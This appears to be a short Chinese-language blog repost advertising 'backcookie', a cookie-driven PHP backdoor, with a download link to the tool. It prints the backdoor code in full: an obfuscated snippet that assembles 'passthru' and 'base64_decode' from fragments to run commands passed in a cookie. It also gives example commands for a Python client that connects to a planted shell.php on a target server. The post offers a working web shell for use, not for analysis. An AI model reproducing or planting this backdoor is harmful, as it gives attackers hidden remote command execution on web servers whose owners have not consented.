backcookie 一款后门生成工具

自动草稿

Small backdoor using cookie.

==========

<?php
# the code of the backdoor used
$bOne = “pa”.”ss”.”th”.”ru”;
$bTwo = “ba”.”se”.”64″.”_”.”de”.”co”.”de”;
$bKey = “yourcookie”; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py –url http://target.com/shell.php –cookie name_cookie
自定义命令(binfo),您可以获得客观信息
@pwned:~$ binfo
自定义命令(退出),退出。
@pwned:~$ exit
文章来源及下载:

https://github.com/jofpin/backcookie

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
相关推荐
  • 暂无相关文章
  • 评论 抢沙发

    请登录后发表评论

      暂无评论内容